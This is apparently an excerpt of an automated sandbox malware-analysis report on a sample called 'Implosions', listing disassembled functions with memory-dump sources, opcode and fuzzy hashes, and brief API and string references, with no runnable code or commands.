              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: AllocString_malloc
              • String ID:
              • API String ID: 959018026-0
              • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
              • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
              • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
              • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
              Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
              Download Yara Rule
              APIs
              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
              Memory Dump Source
              • Source File: 00000000.00000002.2909077776.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2909046888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909112657.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2909148109.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Implosions.jbxd
              Similarity
              • API ID: CreateHeap
              • String ID:
              • API String ID: 10892065-0
              • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
              • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
              • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
              • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
              Function 05CA56F0 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: 773d2067ecf037e553f8a9e490048c784210662fd75c253681ac1aee5bbca5b7
              • Instruction ID: 23e30be0a33fbddc8d22feba6159f526b52bc9c89dcb422f949d90b28537a552
              • Opcode Fuzzy Hash: 773d2067ecf037e553f8a9e490048c784210662fd75c253681ac1aee5bbca5b7
              • Instruction Fuzzy Hash: 25A1AD35B002069FDB54DF68C494AAEBBB2FF88314F548969D8069B364DB31FD41CB90
              Function 05CADA80 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              • Opcode ID: 88f7de88e1ab0f648c16eb4dc067cc187d801bb9aa9f235ca197d091b0e1aee4
              • Instruction ID: 186f7221300fc13c047c51eaaceba6652c404150312f46212f97711eca08a386
              • Opcode Fuzzy Hash: 88f7de88e1ab0f648c16eb4dc067cc187d801bb9aa9f235ca197d091b0e1aee4
              • Instruction Fuzzy Hash: 03911671A04209DFCB14DFA8D498AADBBF2FF88304F648969E406EB354DB74AD45CB50
              Function 05CEEE40 Relevance: 1.5, Strings: 1, Instructions: 214COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q
              • API String ID: 0-538443824
              • Opcode ID: 600b8a8b8b1034dd59433602a7ee1014b5be1a34f4517665e06bcce7fbc888e7
              • Instruction ID: 9b631538a0e01fbd6c5e16c35bfcbd8d2b3499aa8616564265bfff707900a97d
              • Opcode Fuzzy Hash: 600b8a8b8b1034dd59433602a7ee1014b5be1a34f4517665e06bcce7fbc888e7
              • Instruction Fuzzy Hash: 05816E30A103099FDB14EFB8D4556ADBBB6FF85340F50852DE906AB394EF70A945CB50
              Function 05CEA439 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `_q
              • API String ID: 0-2041170535
              • Opcode ID: b18673344b0cf33a035478a7df1b7cbd0afb5f7be3220060e326f921304b0771
              • Instruction ID: 5d0460355681055f1a9b32574ddd5d0b04918bf16006f48e517c82bc6bace371
              • Opcode Fuzzy Hash: b18673344b0cf33a035478a7df1b7cbd0afb5f7be3220060e326f921304b0771
              • Instruction Fuzzy Hash: 25818C306007019FCB15DB79C998A6ABBF6FF84300F548D29E0568B7A5DF74E986CB90
              Function 05CE41A0 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              • Opcode ID: 957e75e543de8ebbf0e4ca2a9606f14f9b4216309ef34a4ffafd247464d5b6e3
              • Instruction ID: 7538bfb958226285e3873b9d887d6c83367952832d6b376ca144d214702986c2
              • Opcode Fuzzy Hash: 957e75e543de8ebbf0e4ca2a9606f14f9b4216309ef34a4ffafd247464d5b6e3
              • Instruction Fuzzy Hash: 9E718E74B002059FDB18DFA9D484AAEBBF2FF88310F158869E805AB351DB74ED41CB90
              Function 05CEAC68 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: 3b4d2258a219d56540d431c586dfd811e900d6c4bccad33fdfa13be356d6d99a
              • Instruction ID: e714ad9be94cb6342d2ae0fb0fc02c8e0eff289660a7cdaac88f99ba015e4f7c
              • Opcode Fuzzy Hash: 3b4d2258a219d56540d431c586dfd811e900d6c4bccad33fdfa13be356d6d99a
              • Instruction Fuzzy Hash: B1619E313003058FC765EF38E5946AABBE2FF84300B548969E4468BB59EF35ED46CB91
              Function 05D65A50 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              • Opcode ID: 3e3ad1ba616e78068e0bf333650623832bcc688c46116f11357b5224b6697303
              • Instruction ID: 564a19f76d5dcc3d113180f13e4712eab9bd7bad793b41c77d8334224beb9446
              • Opcode Fuzzy Hash: 3e3ad1ba616e78068e0bf333650623832bcc688c46116f11357b5224b6697303
              • Instruction Fuzzy Hash: 9851BF30F103499FCB45AB7890292BEBFA6FFD9301B64452AE506D7380EF34AD428B55
              Function 05DEA828 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: Hbq
              • API String ID: 0-1245868
              • Opcode ID: 4632931b86bdca48e4045c4b32587c1c22aebda118f02800ae65791151470409
              • Instruction ID: fe959a838df8e04cd8baac3b4891c4cefe2808707cf67cff511568f040cee9fa
              • Opcode Fuzzy Hash: 4632931b86bdca48e4045c4b32587c1c22aebda118f02800ae65791151470409
              • Instruction Fuzzy Hash: 5B51E230B00211AFCB15EB78D4696AEBBE7FFC8350B548566E806E7344EF309D068B95
              Function 05CA0440 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `;bq
              • API String ID: 0-1117088481
              • Opcode ID: dd9a33ce9673f9f3b10829ba543bcd23ecbfb265a97828aabe599c84a3e592ac
              • Instruction ID: b1f8a6fca1e9d5ff5a6290031ee4f11379aa4dde91967805f6363e28b545a7dc
              • Opcode Fuzzy Hash: dd9a33ce9673f9f3b10829ba543bcd23ecbfb265a97828aabe599c84a3e592ac
              • Instruction Fuzzy Hash: BE51FF307043019FDB15AB78A0A46AE7AE7EF84340F948E78C406DB395EF70EC498790
              Function 05DE594B Relevance: 1.4, Strings: 1, Instructions: 151COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: c135a806ee047048984f86af190694805cc8940a694e845be146e2ab8be90134
              • Instruction ID: fda1fa10b3b6a6a2f97fac5d309af220405c0c5e656a70e9aff39c24a56b82b0
              • Opcode Fuzzy Hash: c135a806ee047048984f86af190694805cc8940a694e845be146e2ab8be90134
              • Instruction Fuzzy Hash: 7B51BE31B00616AFCB15EF68D8809AEFBB2FF84354B15866AD459DB391DB30BC418BD0
              Function 05CA042F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: `;bq
              • API String ID: 0-1117088481
              • Opcode ID: d31d4738a233dd79d1ff3e8468ac3a5d042d2af4af7cd31f99acfa802a1101b0
              • Instruction ID: fd2c0186ac01923d844f49db49e72cb1cf875c6a47df9834be562806103f467c
              • Opcode Fuzzy Hash: d31d4738a233dd79d1ff3e8468ac3a5d042d2af4af7cd31f99acfa802a1101b0
              • Instruction Fuzzy Hash: 8E21A131214301AFD715EB68D5907DEBAA7EF80340F908E38C0168B765DFB1B98D8BA0
              Function 05CA0C40 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: LR^q
              • API String ID: 0-2625958711
              • Opcode ID: db14f0691168fd3f2c13af3f368f5df3f8cc3c69a53ef2c9cd98ba646d3e26d4
              • Instruction ID: b1ef4d7288f9f400c08171f19e5416d41e120a1ca0d4741ce4ecf1b1c533fc72
              • Opcode Fuzzy Hash: db14f0691168fd3f2c13af3f368f5df3f8cc3c69a53ef2c9cd98ba646d3e26d4
              • Instruction Fuzzy Hash: 7C21F1363001068BEB04DA66D094B3A7BE7FBC4A8CF14C529D50AAB384DA30DD02C7C6
              Function 05CEAC63 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: 5105a62726a66bdc45ce4ab9290a39c2256c88f45a517d5515914f9495dfc723
              • Instruction ID: 9002d0b86d98c74c1fabb763279641d8bfff4d2f343c08499a60b0d175e2ce8a
              • Opcode Fuzzy Hash: 5105a62726a66bdc45ce4ab9290a39c2256c88f45a517d5515914f9495dfc723
              • Instruction Fuzzy Hash: 82314D312006059FC725EF28E994A9ABBB2FF843047509E2DE4464BB64DB71FD49CB91
              Function 05CEF123 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q
              • API String ID: 0-538443824
              • Opcode ID: 9c79060ab5052e980eb1fdb3a9fd713aa1be86ad2aa71a8d9cb0d2acadb5efb6
              • Instruction ID: 7f0bcfea1c2252d271c67094ca34a1756205ead0f7b13b5d98feb9ab1c89bcd9
              • Opcode Fuzzy Hash: 9c79060ab5052e980eb1fdb3a9fd713aa1be86ad2aa71a8d9cb0d2acadb5efb6
              • Instruction Fuzzy Hash: 7E219F30B10305AFDB58AF78902477E3BE6BF84200B64456DE906CB381EE35ED01CB50
              Function 05CE946B Relevance: 1.3, Strings: 1, Instructions: 70COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (bq
              • API String ID: 0-149360118
              • Opcode ID: 3606f9abbdfd34003e0a886ed43ec1f5ede5f798c9cddef20182894081b6676e
              • Instruction ID: 3c5a9dafa9795da91ab1a45e4e45705e297502a549774fc6450aac172544636c
              • Opcode Fuzzy Hash: 3606f9abbdfd34003e0a886ed43ec1f5ede5f798c9cddef20182894081b6676e
              • Instruction Fuzzy Hash: 1E212131B093919FC3159B399454A2ABFF6EFC2250B5881ABE845DB385EB34DC02C790
              Function 05CEEF07 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: (_^q
              • API String ID: 0-538443824
              • Opcode ID: 4c774d3529eeafe7fd707712f7f8779c668f778bb2381f4f8faf27aafcb625fe
              • Instruction ID: 7af2f68f99918ace9bc112faa3e7804a6d1db9cac4c81912904d9a8afc03e477
              • Opcode Fuzzy Hash: 4c774d3529eeafe7fd707712f7f8779c668f778bb2381f4f8faf27aafcb625fe
              • Instruction Fuzzy Hash: 2C219F30E103499FDB05EFA4D4947AEBBB6FF85340F608829E506AB294DF706905CB94
              Function 05DEFE0B Relevance: 1.3, Strings: 1, Instructions: 41COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: b0d6a21f9f3632e9e0bc70f32afd90550fadf86a904e0b89414bee8f963df823
              • Instruction ID: d56b7d0e48a5fa62e98efb1995a1d4b652077cc148972efe7c0a6641f3a78549
              • Opcode Fuzzy Hash: b0d6a21f9f3632e9e0bc70f32afd90550fadf86a904e0b89414bee8f963df823
              • Instruction Fuzzy Hash: A20179312546069FC720DB2CD980A9AB7A6FFC0710B509B3590558B7A9DB70F9498B90
              Function 05CE5F48 Relevance: .5, Instructions: 466COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6fcb70a65b701be7259bb4c5758567565bc4217f38ded09bec6bc44e241cfc64
              • Instruction ID: 75a41030eec92b52feea7f812982e589a7c8b0c9ba42dca644b963cbdabc5b9e
              • Opcode Fuzzy Hash: 6fcb70a65b701be7259bb4c5758567565bc4217f38ded09bec6bc44e241cfc64
              • Instruction Fuzzy Hash: FB124870A003059FDB15EF64D494AADBBB2FF84300F549A69D4059F36ADB74EC89CB90
              Function 05CE5F43 Relevance: .4, Instructions: 443COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2c6be2c18a4ca5fe018c04ad8cbef8cd0187207d534a18ac33c4cb8bed43323
              • Instruction ID: bb961cf23f647936b662ca37685084260271f29eff882cfaf67020f4b276b62c
              • Opcode Fuzzy Hash: e2c6be2c18a4ca5fe018c04ad8cbef8cd0187207d534a18ac33c4cb8bed43323
              • Instruction Fuzzy Hash: B1123870A003069FDB15EF64D894AADBBB2FF84300F549A69D4055F36ADB74EC89CB90
              Function 05CADC53 Relevance: .4, Instructions: 353COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18f1b9479da7e87adbb9d49e3ec260a6b7a3a3b129b80a159dd08770b6e428c0
              • Instruction ID: c2a34e52e5f20a994d8ed594240c0e9805e553229fa9444b3f1c461dae220ebc
              • Opcode Fuzzy Hash: 18f1b9479da7e87adbb9d49e3ec260a6b7a3a3b129b80a159dd08770b6e428c0
              • Instruction Fuzzy Hash: F9E10831A00206DFDB14DFA4D498AADBBF2FF44308F508868E416AF7A5DB75AD85CB40
              Function 05CE7F28 Relevance: .3, Instructions: 325COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 28f5bb1133ff5f0733c816364bb9b39728fd988da5c7bb2962803c1dd7e2a989
              • Instruction ID: 7567cb475f7fb2c64d6eb873bfa32b26f07d53e06a8615fb7c9f9d4ca256a067
              • Opcode Fuzzy Hash: 28f5bb1133ff5f0733c816364bb9b39728fd988da5c7bb2962803c1dd7e2a989
              • Instruction Fuzzy Hash: ECD13770A00205DFDB14EF64D994AAEF7B2FF84300F549A69D405AB365DB70ED8ACB90
              Function 05CE0118 Relevance: .3, Instructions: 300COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: efd44167e2363f3a80b962462985608d4171a4c6b638439d84b48fc8afb77744
              • Instruction ID: ecda0faac1f69b2ca0772012e5f10fb256cdd0f74e4266eaa823025d71021735
              • Opcode Fuzzy Hash: efd44167e2363f3a80b962462985608d4171a4c6b638439d84b48fc8afb77744
              • Instruction Fuzzy Hash: 83A1CD31B086118FCB69DB69D498B6DB7E2FF84310B058869D806EB365DBB1ED41CBD0
              Function 05CE4E00 Relevance: .3, Instructions: 269COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: af4e540273291f3296ff98e4a451dcaee12c81ba699cf60bbf03e6cf960da21a
              • Instruction ID: f9dfa48abd813857fd13e2f644b2d7155687a2dbbad7e2e5be7ac9382a7b9ed6
              • Opcode Fuzzy Hash: af4e540273291f3296ff98e4a451dcaee12c81ba699cf60bbf03e6cf960da21a
              • Instruction Fuzzy Hash: 96B14574A00205CFCB19DF69D584AAEBBF2FF88314F148969E8169B351DB34ED85CB90
              Function 05DEC568 Relevance: .3, Instructions: 256COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 54a4dcef94a082001f885e40638c7162e1bd7a50abbff3e20f568516d76f071a
              • Instruction ID: b2a020bc96594212979cf41854a879041571155cd4ea1bb15333631db117a289
              • Opcode Fuzzy Hash: 54a4dcef94a082001f885e40638c7162e1bd7a50abbff3e20f568516d76f071a
              • Instruction Fuzzy Hash: C4B14934A20345CFDB25EF68D589B6DBBB2BF44301F14856AE4469B361EB34EC86CB50
              Function 05DE9D80 Relevance: .2, Instructions: 250COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 509fa21d7c169de98996d048406a2b3eb9450c75f5e4a56ac3e71aa7f3a39f96
              • Instruction ID: 253b606c862c109942d1c046d2bf703108f5ea94eecb38ab4e4d9b7a1da29747
              • Opcode Fuzzy Hash: 509fa21d7c169de98996d048406a2b3eb9450c75f5e4a56ac3e71aa7f3a39f96
              • Instruction Fuzzy Hash: 56A1C4306047468FC725EB39D554AAABBF2FF88300B548A2AD4468BB55DF30FC49CB90
              Function 05DEB9C8 Relevance: .2, Instructions: 243COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a3eadbbf1cd2febe731f4084be9fa8268ee7ff409f5023151b9bcc5c0771a72b
              • Instruction ID: 29e2003ae07d60594534762f71ba9ce44937a2f3a8fb1ffa4be9f4ea7fc21014
              • Opcode Fuzzy Hash: a3eadbbf1cd2febe731f4084be9fa8268ee7ff409f5023151b9bcc5c0771a72b
              • Instruction Fuzzy Hash: E9B12D30A1061ADBEB14EF64D855B9DBB72FF44300F50869AE84AA7250DF74AE85CF90
              Function 05CEFC5F Relevance: .2, Instructions: 228COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9fb489d6afc03ac740845097bda995d37319610b51e822ea4f536ffe2fa19a0
              • Instruction ID: a4ab07ec8f803e2241780c70c5fe3043f035637000a8bb4411c75b9210f07c6a
              • Opcode Fuzzy Hash: a9fb489d6afc03ac740845097bda995d37319610b51e822ea4f536ffe2fa19a0
              • Instruction Fuzzy Hash: 42A15134A10209CFCB04DFA8D594A9DBBB2FF88314F158569E806AB365DB71ED46CF90
              Function 05D60A31 Relevance: .2, Instructions: 225COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7aa1957581d743b2f23269d88a8aaba6649c6f488884c686aa82cbe13e140b05
              • Instruction ID: 5212d96488b42427e588a62aecc236067e3552bd19e933e64741ac59d2fef1e9
              • Opcode Fuzzy Hash: 7aa1957581d743b2f23269d88a8aaba6649c6f488884c686aa82cbe13e140b05
              • Instruction Fuzzy Hash: A5913C34710205CFDB08DF69C498AAA7BE6FF88304F15816AE506DB3A5DB35EC42CB90
              Function 05D610F8 Relevance: .2, Instructions: 203COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 07a661ab8105e5fee3e7ac6220391367e341c7e8b8a5b1733e7cde69f0266ce5
              • Instruction ID: 177136d508d0c31eeb63a92dbe3cb35bfcfe59d9a5a39bc34ca2966224859303
              • Opcode Fuzzy Hash: 07a661ab8105e5fee3e7ac6220391367e341c7e8b8a5b1733e7cde69f0266ce5
              • Instruction Fuzzy Hash: EE812834A012099FDB14CFA9D554BADBBF2BF88300F14846AE846EB365DB35E945CB50
              Function 05CA2D29 Relevance: .2, Instructions: 194COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6614eb07d191354454a76119c86f0cb39c4509670b302b160376753413020811
              • Instruction ID: 71f1f8075ad8cff7a80b0774da662a7e33c49f516c9607a6ebabaea92e4254a1
              • Opcode Fuzzy Hash: 6614eb07d191354454a76119c86f0cb39c4509670b302b160376753413020811
              • Instruction Fuzzy Hash: 50716834A012069FCB19CF68D494AADBBF3FF88204B208869E805DB350DB35ED42CB91
              Function 05CEBF20 Relevance: .2, Instructions: 191COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 720aa08c29da103c30598b899c12aa01ba21c673c69115bf229c57068085b3ef
              • Instruction ID: decc48eb289285cd5566302757af8286967ae3b0ba3eac5b4466ca079d5963b0
              • Opcode Fuzzy Hash: 720aa08c29da103c30598b899c12aa01ba21c673c69115bf229c57068085b3ef
              • Instruction Fuzzy Hash: 55816C35A04284CFDB55DF78C488BA97BB2EB89314F284499D902AB394DB34ED84DB64
              Function 05CACCB7 Relevance: .2, Instructions: 185COMMON
              Download Yara Rule
              Memory Dump Source
